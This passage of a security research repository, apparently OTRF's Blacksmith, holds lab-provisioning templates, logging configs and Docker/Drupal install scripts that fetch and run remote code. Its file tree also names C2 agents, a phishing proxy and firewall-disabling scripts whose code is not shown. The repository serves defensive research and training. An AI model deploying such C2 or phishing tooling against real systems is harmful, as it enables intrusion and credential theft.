├── .gitignore
├── .gitmodules
├── LICENSE
├── README.md
├── resources
├── configs
│ ├── SilkETW
│ │ └── SilkServiceConfig.xml
│ ├── auoms-outconf
│ │ └── syslog.conf
│ ├── auoms-rules
│ │ └── mstic-research.rules
│ ├── bginfo
│ │ ├── OTRWallPaper.bgi
│ │ └── otr.jpg
│ ├── go-audit
│ │ ├── 00-go-audit-config.conf
│ │ └── go-audit.service
│ ├── nxlog
│ │ └── nxlogWEC.conf
│ ├── rpcfirewall
│ │ └── RpcFw.conf
│ ├── syslog
│ │ └── auoms-outconf-syslog.conf
│ ├── sysmon
│ │ ├── linux
│ │ │ ├── sysmon.xml
│ │ │ └── sysmonv1.0.0.xml
│ │ ├── sysmon.xml
│ │ ├── sysmonv11.0.xml
│ │ ├── sysmonv11.11.xml
│ │ ├── sysmonv12.03.xml
│ │ ├── sysmonv13.01.xml
│ │ ├── sysmonv13.10.xml
│ │ ├── sysmonv13.21.xml
│ │ ├── sysmonv13.22.xml
│ │ ├── sysmonv13.30.xml
│ │ ├── sysmonv14.0.xml
│ │ ├── sysmonv14.14.xml
│ │ ├── sysmonv15.0.xml
│ │ └── sysmonv15.15.xml
│ └── wef
│ │ ├── subscriptions.zip
│ │ └── subscriptions
│ │ ├── bits-client.xml
│ │ ├── directory-service.xml
│ │ ├── dns-client.xml
│ │ ├── firewall-advanced-security.xml
│ │ ├── powershell-operational.xml
│ │ ├── powershell.xml
│ │ ├── security.xml
│ │ ├── sysmon.xml
│ │ ├── system.xml
│ │ ├── task-scheduler.xml
│ │ ├── terminal-services.xml
│ │ └── wmi-activity.xml
├── images
│ ├── win10-ad-mxs_01_exchange_admin_center_login.png
│ ├── win10-ad-mxs_02_exchange_admin_center_portal.png
│ ├── win10-ad-mxs_03_owa_login.png
│ ├── win10-ad-mxs_04_owa_new_message.png
│ └── win10-ad-mxs_05_owa_message_received.png
└── scripts
│ ├── bash
│ ├── Install-Auditd.sh
│ ├── Install-C2s.sh
│ ├── Install-Docker.sh
│ ├── Install-Drupal.sh
│ ├── Install-EvilGinx2.sh
│ ├── Install-Logstash.sh
│ ├── Install-OMI.sh
│ ├── Install-OMS-Auditd-Plugin.sh
│ ├── Install-OMS-Linux-Agent.sh
│ ├── Install-PenPot.sh
│ ├── Install-Sysmon-For-Linux.sh
│ └── install-go-audit.sh
│ ├── docker
│ ├── caldera
│ │ ├── 2.6.6-040520
│ │ │ └── docker-compose-caldera.yml
│ │ └── old
│ │ │ ├── Dockerfile
│ │ │ ├── conf
│ │ │ ├── a93f6915-a9b8-4a6b-ad46-c072963b32c1.yml
│ │ │ └── local.yml
│ │ │ └── docker-compose-caldera.yml
│ ├── neo4j
│ │ └── Dockerfile
│ ├── nginx
│ │ ├── Dockerfile
│ │ ├── configs
│ │ │ └── penpot
│ │ └── scripts
│ │ │ └── nginx-entrypoint.sh
│ └── penpot
│ │ └── docker-compose.yaml
│ └── powershell
│ ├── active-directory
│ ├── Add-DomainUsers.ps1
│ ├── Add-GraphPermissions.ps1
│ ├── Configure-AzADConnectSCP.ps1
│ ├── Create-SecurityGroup.ps1
│ ├── Deploy-Forest.ps1
│ ├── Import-GPO.ps1
│ ├── Join-Domain.ps1
│ ├── New-AppRegistration.ps1
│ ├── New-NetworkShares.ps1
│ ├── Set-ADFSFarm.ps1
│ └── Set-OUs.ps1
│ ├── auditing
│ ├── Configure-WEC.ps1
│ ├── Configure-WEF-Client.ps1
│ ├── Enable-PowerShell-Logging.ps1
│ ├── Enable-WinAuditCategories.ps1
│ ├── Set-AuditSAMRemoteCalls.ps1
│ └── Set-SACLs.ps1
│ ├── azure-active-directory
│ ├── Get-DeviceCode.ps1
│ ├── Grant-AzADPermissions.ps1
│ └── New-AzADManagedIdentity.ps1
│ ├── c2
│ ├── Invoke-Manx.ps1
│ └── invoke-sandcat.ps1
│ ├── dsc
│ ├── active-directory
│ │ ├── Create-AD.ps1
│ │ ├── Create-AD.zip
│ │ ├── Install-ADFS.ps1
│ │ ├── Install-ADFS.zip
│ │ ├── Join-Domain.ps1
│ │ ├── Join-Domain.zip
│ │ ├── Prepare-ADFS.ps1
│ │ └── Prepare-ADFS.zip
│ ├── misc
│ │ ├── Enable-TLS12.ps1
│ │ ├── Enable-TLS12.zip
│ │ ├── Import-PfxCert.ps1
│ │ ├── Import-PfxCert.zip
│ │ ├── Install-AADConnect.ps1
│ │ ├── Install-AADConnect.zip
│ │ ├── Install-HyperV.ps1
│ │ └── Install-HyperV.zip
│ ├── ms-exchange
│ │ ├── Install-MSExchange.ps1
│ │ ├── Install-MSExchange.zip
│ │ ├── PostInstall-MSExchange.ps1
│ │ ├── PostInstall-MSExchange.zip
│ │ ├── Prepare-MSExchange.ps1
│ │ ├── Prepare-MSExchange.zip
│ │ ├── PrepareAD-MSExchange.ps1
│ │ └── PrepareAD-MSExchange.zip
│ └── software
│ │ ├── Install-Sysmon.ps1
│ │ └── Install-Sysmon.zip
│ ├── endpoint-software
│ ├── Install-BadBlood.ps1
│ ├── Install-JonMon.ps1
│ ├── Install-LDAPFW.ps1
│ ├── Install-Log-Shipper.ps1
│ ├── Install-PowerAutomate.ps1
│ ├── Install-RE-Tools.ps1
│ ├── Install-RPCFW.ps1
│ ├── Install-SilkETW.ps1
│ └── Install-Sysmon.ps1
│ ├── microsoft365-defender
│ └── Invoke-M365DStreaming.ps1
│ └── misc
│ ├── Add-EvilGinx-Hosts.ps1
│ ├── Configure-PSRemoting.ps1
│ ├── Create-TestScheduledTask.ps1
│ ├── Disarm-Box.ps1
│ ├── Disarm-Firewall.ps1
│ ├── Get-CertSigningReq.ps1
│ ├── Invoke-WMISubscription.ps1
│ ├── Prepare-Box.ps1
│ ├── Register-PADMachine.ps1
│ ├── Rename-Computer.ps1
│ ├── Set-ProxyServer.ps1
│ ├── Set-StaticIP.ps1
│ ├── Set-WallPaper.ps1
│ ├── Update-LocalAdminPWD.ps1
│ └── Update-RemoteTask.ps1
└── templates
└── azure
├── Authorization-Role-Assignments
└── resourceScope.json
├── Azure-Automation-Account
├── AzureAutomationTutorialNew.ps1
└── azuredeploy.json
├── Azure-Bastion-Host
├── README.md
└── azuredeploy.json
├── Azure-CosmosDB-Graph
├── README.md
└── azuredeploy.json
├── Azure-EventHub
├── README.md
├── azuredeploy.json
├── azuredeploy.parameters.json
└── main.bicep
├── Azure-FunctionApp-Win-Pwsh
├── README.md
├── azuredeploy.json
├── funcApp.zip
└── funcApp
│ ├── .funcignore
│ ├── .gitignore
│ ├── .vscode
│ ├── extensions.json
│ ├── launch.json
│ ├── settings.json
│ └── tasks.json
│ ├── Hello
│ ├── function.json
│ ├── run.ps1
│ └── sample.dat
│ ├── host.json
│ ├── profile.ps1
│ └── requirements.psd1
├── Azure-Key-Vault
├── README.md
└── azuredeploy.json
├── Azure-Monitor-Agents
├── README.md
├── linux.json
└── windows.json
├── Azure-Monitor-Data-Collection-Endpoint
├── README.md
└── azuredeploy.json
├── Azure-Monitor-Data-Collection-Rules
├── azuredeploy-2021-09-01-preview.json
├── azuredeploy.json
└── custom-data-ingestion
│ ├── SecurityEvent.json
│ ├── Syslog.json
│ ├── WindowsEvent.json
│ └── allDCRs.json
├── Azure-Monitor-Dependency-Agents
└── azuredeploy.json
├── Azure-Resources-Deployment-Scripts
└── azuredeploy.json
├── Azure-Static-WebApp
└── auredeploy.json
├── CEF-Log-Analytics-Agent
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ └── customScript.json
└── scripts
│ ├── Set-Up-CEF.sh
│ ├── cef_replace.yaml
│ └── cef_simulator.py
├── Linux-C2
├── README.md
└── azuredeploy.json
├── Linux-Drupal
├── README.md
└── azuredeploy.json
├── Linux-EvilGinx2
└── azuredeploy.json
├── Linux
├── README.md
├── azuredeploy.json
├── demos
│ └── linux-201.json
└── nestedtemplates
│ └── customScript.json
├── Log-Analytics-Workspace-Sentinel
├── README.md
├── azuredeploy.json
├── demos
│ └── LA-Sentinel-Windows-Settings.json
├── main.bicep
└── main.json
├── Log-Analytics-Workspace-Solutions
├── README.md
└── azuredeploy.json
├── Log-Analytics-Workspace
├── README.md
├── azuredeploy.json
└── main.bicep
├── Microsoft-Antimalware-Extension-Windows
└── azuredeploy.json
├── Onboard-Endpoints-MDE
└── azuredeploy.json
├── Onboard-Endpoints-MDI
├── azuredeploy.json
└── scripts
│ └── Install-Sensor.ps1
├── Storage-Account-Private-Container
├── README.md
├── azuredeploy.json
└── images
│ ├── AzureDefenderStorage.png
│ └── DiagnosticLogging.png
├── Storage-Account-Queue-Services
├── README.md
└── azuredeploy.json
├── User-Assigned-Managed-Identity
└── azuredeploy.json
├── Virtual-Network-Peerings
├── README.md
└── azuredeploy.json
├── Win-Server-Hybrid-Runbook-Worker
├── README.md
└── azuredeploy.json
├── Win-Server-HyperV
├── README.md
├── azuredeploy.json
├── azuredeploy.parameters.json
└── nestedtemplates
│ └── installHyperV.json
├── Win-Server
├── README.md
├── azuredeploy.json
├── azuredeploy.parameters.json
└── scripts
│ ├── Install-DSC-Modules.ps1
│ └── Set-Initial-Settings.ps1
├── Win10-AD-ADFS
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ ├── importPfxCert.json
│ ├── installADFS.json
│ └── prepareADFS.json
└── scripts
│ ├── Install-DSC-Modules.ps1
│ └── Set-Initial-Settings.ps1
├── Win10-AD-MXS
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ ├── createADForest.json
│ ├── customScriptExtension.json
│ ├── installMSExchange.json
│ ├── postInstallMSExchange.json
│ ├── prepareADMSExchange.json
│ └── prepareMSExchange.json
└── scripts
│ ├── Download-MSExchangeISO.ps1
│ ├── Install-DSC-Modules.ps1
│ └── Set-Initial-Settings.ps1
├── Win10-AD-WEC
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ ├── createADForest.json
│ ├── customScriptExtension.json
│ └── customScriptExtensionArray.json
└── scripts
│ ├── Install-DSC-Modules.ps1
│ └── Set-Initial-Settings.ps1
├── Win10-AD
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ ├── createADForest.json
│ ├── enableTLS12.json
│ ├── installAADConnect.json
│ ├── joinDomain.json
│ └── vnet-dns-server.json
└── scripts
│ ├── Install-DSC-Modules.ps1
│ └── Set-Initial-Settings.ps1
├── Win10-PAN-FW
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ ├── customScript.json
│ └── customScriptExtension.json
└── scripts
│ ├── Set-Initial-Settings.ps1
│ ├── Set-Up-CEF.sh
│ ├── Set-Up-FW.sh
│ └── azure-sample.xml
├── Win10-WDA-EventHub
└── azuredeploy.json
└── Win10
├── README.md
├── azuredeploy.json
├── azuredeploy.parameters.json
├── demos
├── README.md
├── Win10-101.json
├── Win10-201.json
├── Win10-FreshInstall.json
└── Win10-Microsoft-Sentinel.json
├── nestedtemplates
├── customScriptExtension.json
├── customScriptExtensionArray.json
└── sysmonInstall.json
└── scripts
├── Install-DSC-Modules.ps1
└── Set-Initial-Settings.ps1
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | aws/mordor/.DS_Store
3 | .DS_Store
4 |
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/.gitmodules
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Blacksmith
2 |
3 | [](https://twitter.com/OTR_Community)
4 | [](https://github.com/ellerbrock/open-source-badges/)
5 |
6 | The Blacksmith project focuses on providing dynamic easy-to-use templates for security researches to model and provision resources to automatically deploy applications and small networks in the cloud. It currently leverages [AWS CloudFormation](https://aws.amazon.com/cloudformation/) and [Microsoft Azure Resource Manager (ARM)]() templates to implement infrastructure as code for cloud solutions.
7 |
8 | # Goals
9 |
10 | * Expedite research by providing dynamic templates to deploy applications in the cloud.
11 | * Translate favorite applications or tools into cloud templates for developing and testing.
12 | * Replicate research environments for training purposes
13 | * Learn more about AWS CloudFormation
14 | * Learn more about Microsoft's Azure Resource Manager (ARM) templates
15 |
16 | # Getting Started
17 |
18 | * [Blacksmith ReadTheDocs](https://blacksmith.readthedocs.io/en/latest/index.html)
19 |
20 | # Contributing
21 |
22 | We would love to hear your feedback after using the templates in this project. Let me know also if you also would like to share an environment or an application with the community. Thank you in advance!
23 |
24 | # License: GPL-3.0
25 |
26 | [ Blacksmith's GNU General Public License](https://github.com/OTRF/Blacksmith/blob/master/LICENSE)
--------------------------------------------------------------------------------
/resources/configs/bginfo/OTRWallPaper.bgi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/configs/bginfo/OTRWallPaper.bgi
--------------------------------------------------------------------------------
/resources/configs/bginfo/otr.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/configs/bginfo/otr.jpg
--------------------------------------------------------------------------------
/resources/configs/go-audit/00-go-audit-config.conf:
--------------------------------------------------------------------------------
1 | input {
2 | file { path => "/var/log/go-audit/go-audit.log" }
3 | }
4 | filter {
5 | json { source => "message" }
6 | }
7 | output {
8 | file {
9 | path => "/var/log/go-audit/json-%{+YYYY-MM-dd-hhmmss.ff}.json"
10 | }
11 | }
--------------------------------------------------------------------------------
/resources/configs/go-audit/go-audit.service:
--------------------------------------------------------------------------------
1 | # /etc/systemd/system/go-audit.service
2 | [Unit]
3 | Description = go-audit
4 | After=network.target auditd.service
5 | Conflicts = auditd.service
6 |
7 | [Service]
8 | Type = simple
9 | ExecStart = /usr/local/bin/go-audit -config /etc/go-audit.yaml
10 |
11 | [Install]
12 | WantedBy = multi-user.target
--------------------------------------------------------------------------------
/resources/configs/nxlog/nxlogWEC.conf:
--------------------------------------------------------------------------------
1 | Panic Soft
2 | #NoFreeOnExit TRUE
3 |
4 | define ROOT C:\Program Files (x86)\nxlog
5 | define CERTDIR %ROOT%\cert
6 | define CONFDIR %ROOT%\conf
7 | define LOGDIR %ROOT%\data
8 | define LOGFILE %LOGDIR%\nxlog.log
9 | LogFile %LOGFILE%
10 |
11 | Moduledir %ROOT%\modules
12 | CacheDir %ROOT%\data
13 | Pidfile %ROOT%\data\nxlog.pid
14 | SpoolDir %ROOT%\data
15 |
16 |
17 | Module xm_json
18 |
19 |
20 |
21 | Module im_msvistalog
22 | Query \
23 | \
24 | \
25 | \
26 |
27 |
28 | rename_field("ProcessID", "ExecutionProcessID");
29 | if ( $EventID == 4688 )
30 | {
31 | if ($raw_event =~ /Creator\sProcess\s?I[Dd]:\s*\b(0x[0-9a-fA-F]+|[0-9]+)\b\s/) $ProcessId = $1;
32 | }
33 | else
34 | {
35 | if ($raw_event =~ /Process\s?I[Dd]:\s*\b(0x[0-9a-fA-F]+|[0-9]+)\b\s/) $ProcessId = $1;
36 | }
37 | if ( $Channel == "Microsoft-Windows-Sysmon/Operational" )
38 | {
39 | if ( $EventID == 12 OR $EventID == 13 OR $EventID == 14 OR $EventID == 17 OR $EventID == 18 OR $EventID == 19 OR $EventID == 20 OR $EventID == 21 )
40 | rename_field("EventType", "EventTypeOrignal");
41 | if ($raw_event =~ /EventType:\s\b([a-zA-Z]+)\b\s/) $EventType = $1;
42 | }
43 |
44 |
45 |
46 |
52 |
53 |
54 | Path eventlog => logstash
55 |
--------------------------------------------------------------------------------
/resources/configs/rpcfirewall/RpcFw.conf:
--------------------------------------------------------------------------------
1 | fw:uuid:e3514235-4b06-11d1-ab04-00c04fc2dcd2 action:allow audit:true verbose:true
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/configs/wef/subscriptions.zip
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/bits-client.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Bits Client
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-Bits-Client/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/directory-service.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Directory Service
4 | SourceInitiated
5 | Everything from the Directory Service channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/dns-client.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | DNS Client
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-DNS-Client/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/firewall-advanced-security.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Firewall Advanced Security
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-Windows Firewall With Advanced Security/Firewall channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/powershell-operational.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | PowerShell Operational
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-PowerShell/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/powershell.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | PowerShell
4 | SourceInitiated
5 | Everything from the Windows PowerShell channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/security.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Security
4 | SourceInitiated
5 | Everything from the Security channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 | *[System[(EventID='5156')]] and
25 | (*[EventData[Data[@Name="DestAddress"] = "192.168.2.5"]])
26 |
27 |
28 |
29 | ]]>
30 |
31 | true
32 | http
33 | Events
34 |
35 | ForwardedEvents
36 | Microsoft-Windows-EventCollector
37 |
38 |
39 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
40 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/sysmon.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Sysmon
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-Sysmon/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 | *[System[(EventID=5156)]] and ((*[EventData[Data[@Name="DestinationIp"] = "192.168.2.5"]]) or (*[EventData[Data[@Name="Image"] = "\\*\networkwatcheragent.exe"]]) or (*[EventData[Data[@Name="Image"] = "\\*\windowsazureguestagent.exe"]]))
24 |
25 |
26 | ]]>
27 |
28 | true
29 | http
30 | Events
31 |
32 | ForwardedEvents
33 | Microsoft-Windows-EventCollector
34 |
35 |
36 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
37 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/system.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | System
4 | SourceInitiated
5 | Everything from the System channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/task-scheduler.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Task Scheduler
4 | SourceInitiated
5 | Events from the Microsoft-Windows-TaskScheduler/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 |
26 | ]]>
27 |
28 | true
29 | http
30 | Events
31 |
32 | ForwardedEvents
33 | Microsoft-Windows-EventCollector
34 |
35 |
36 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
37 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/terminal-services.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Terminal Services
4 | SourceInitiated
5 | Everything from a few terminal services channels
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 | ]]>
29 |
30 | true
31 | http
32 | Events
33 |
34 | ForwardedEvents
35 | Microsoft-Windows-EventCollector
36 |
37 |
38 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
39 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/wmi-activity.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | WMI Activity
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-WMI-Activity/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/images/win10-ad-mxs_01_exchange_admin_center_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/images/win10-ad-mxs_01_exchange_admin_center_login.png
--------------------------------------------------------------------------------
/resources/images/win10-ad-mxs_02_exchange_admin_center_portal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/images/win10-ad-mxs_02_exchange_admin_center_portal.png
--------------------------------------------------------------------------------
/resources/images/win10-ad-mxs_03_owa_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/images/win10-ad-mxs_03_owa_login.png
--------------------------------------------------------------------------------
/resources/images/win10-ad-mxs_04_owa_new_message.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/images/win10-ad-mxs_04_owa_new_message.png
--------------------------------------------------------------------------------
/resources/images/win10-ad-mxs_05_owa_message_received.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/images/win10-ad-mxs_05_owa_message_received.png
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-Auditd.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
6 | apt-get install auditd audispd-plugins
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-Docker.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
6 | # Removing old docker
7 | if [ -x "$(command -v docker)" ]; then
8 | echo "Removing docker.."
9 | apt-get remove -y docker docker-engine docker.io containerd runc
10 | fi
11 |
12 | # Clean APT
13 | apt-get clean
14 |
15 | # Installing latest Docker
16 | echo 'debconf debconf/frontend select Noninteractive' | debconf-set-selections
17 | echo "Installing docker via convenience script.."
18 | curl -fsSL https://get.docker.com -o get-docker.sh
19 | chmod +x get-docker.sh
20 | count=1
21 | until ./get-docker.sh || [ $count -eq 10 ]; do
22 | echo "Docker installation failed. Trying again.."
23 | sleep 5
24 | ((count++))
25 | done
26 |
27 | if [[ "$count" == '10' ]]; then
28 | exit 1
29 | fi
30 |
31 | count=1
32 | # Starting Docker service
33 | while true; do
34 | if (systemctl --quiet is-active docker.service); then
35 | echo "Docker is running."
36 | docker -v
37 | break
38 | else
39 | echo "Docker is not running. Attempting to start it.."
40 | systemctl enable docker.service
41 | systemctl start docker.service
42 | sleep 5
43 | ((count++))
44 | if [[ "$count" == '10' ]]; then
45 | break
46 | fi
47 | fi
48 | done
49 |
50 | if [[ "$count" == '10' ]]; then
51 | exit 1
52 | fi
53 |
54 | # ****** Installing latest docker compose
55 | if [ -x "$(command -v docker-compose)" ]; then
56 | echo "removing docker-compose.."
57 | rm $(which docker-compose)
58 | fi
59 |
60 | echo "Installing docker-compose.."
61 | COMPOSE_VERSION=$(curl -s https://api.github.com/repos/docker/compose/releases/latest | grep 'tag_name' | cut -d\" -f4)
62 | curl -L https://github.com/docker/compose/releases/download/$COMPOSE_VERSION/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
63 | chmod +x /usr/local/bin/docker-compose
64 | docker-compose -v
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-Drupal.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
6 | # *********** log tagging variables ***********
7 | INFO_TAG="[INSTALLATION-INFO]"
8 | ERROR_TAG="[INSTALLATION-ERROR]"
9 |
10 | # *********** Set Log File ***************
11 | LOGFILE="/var/log/Drupal-Install.log"
12 | echoerror() {
13 | printf "${RC} * ERROR${EC}: $@\n" 1>&2;
14 | }
15 |
16 | # *********** Script Menu ***************
17 | usage(){
18 | echo " "
19 | echo "Usage: $0 [option...]" >&2
20 | echo
21 | echo " -v run a specific Drupal version"
22 | echo " -h help menu"
23 | echo
24 | echo "Examples:"
25 | echo " $0 -v 8.6.5-debian-9-r14"
26 | echo " "
27 | exit 1
28 | }
29 |
30 | # ************ Command Options **********************
31 | while getopts v:h option
32 | do
33 | case "${option}"
34 | in
35 | v) RUN_DRUPAL=$OPTARG;;
36 | h) usage;;
37 | \?) usage;;
38 | : ) echo "Missing option argument for -$OPTARG" >&2; exit 1;;
39 | * ) echo "Unimplemented option: -$OPTARG" >&2; exit 1;;
40 | esac
41 | done
42 |
43 | if ((OPTIND == 1))
44 | then
45 | echo "$ERROR_TAG No options specified"
46 | usage
47 | fi
48 |
49 | # Install Docker and Docker-Compose
50 | if [[ ! -f Install-Docker.sh ]]; then
51 | wget https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/scripts/bash/Install-Docker.sh >> $LOGFILE 2>&1
52 | chmod +x Install-Docker.sh >> $LOGFILE 2>&1
53 | fi
54 | ./Install-Docker.sh >> $LOGFILE 2>&1
55 |
56 | # Check what branch to download
57 | if [[ $RUN_DRUPAL == "latest" ]]; then
58 | git clone https://github.com/bitnami/bitnami-docker-drupal /opt/bitnami-docker-drupal >> $LOGFILE 2>&1
59 | else
